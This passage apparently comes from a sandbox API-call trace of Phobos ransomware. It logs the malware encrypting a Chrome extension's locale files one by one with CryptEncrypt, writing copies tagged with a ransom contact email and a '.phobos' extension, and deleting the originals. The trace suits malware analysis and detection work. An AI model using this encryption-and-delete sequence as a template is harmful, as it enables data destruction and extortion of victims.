pbBuffer=0x2f4fd30) returned 1 [0151.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.791] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.791] CloseHandle (hObject=0x130) returned 1 [0151.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json")) returned 0x2020 [0151.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.791] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.791] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.792] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.792] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.795] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.795] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.796] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.796] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.796] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.796] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.796] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.796] CloseHandle (hObject=0x130) returned 1 [0151.796] CloseHandle (hObject=0x138) returned 1 [0151.796] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json")) returned 1 [0151.797] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.797] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.797] CloseHandle (hObject=0x138) returned 1 [0151.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json")) returned 0x2020 [0151.798] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.798] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.798] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.798] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.798] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.798] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.799] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.799] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.800] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.800] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.800] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.800] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.800] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.800] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.800] CloseHandle (hObject=0x138) returned 1 [0151.800] CloseHandle (hObject=0x130) returned 1 [0151.800] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json")) returned 1 [0151.801] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.801] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.801] CloseHandle (hObject=0x130) returned 1 [0151.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json")) returned 0x2020 [0151.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.802] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.802] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.802] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.802] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.802] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.803] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.803] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.804] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.804] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.804] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.804] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.804] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.804] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.804] CloseHandle (hObject=0x130) returned 1 [0151.804] CloseHandle (hObject=0x138) returned 1 [0151.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json")) returned 1 [0151.805] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.806] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.806] CloseHandle (hObject=0x138) returned 1 [0151.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json")) returned 0x2020 [0151.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.806] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.806] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.806] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.806] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.806] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.807] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.807] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.808] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.808] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.808] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.808] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.808] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.808] CloseHandle (hObject=0x138) returned 1 [0151.808] CloseHandle (hObject=0x130) returned 1 [0151.809] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json")) returned 1 [0151.809] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.810] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.810] CloseHandle (hObject=0x130) returned 1 [0151.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json")) returned 0x2020 [0151.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 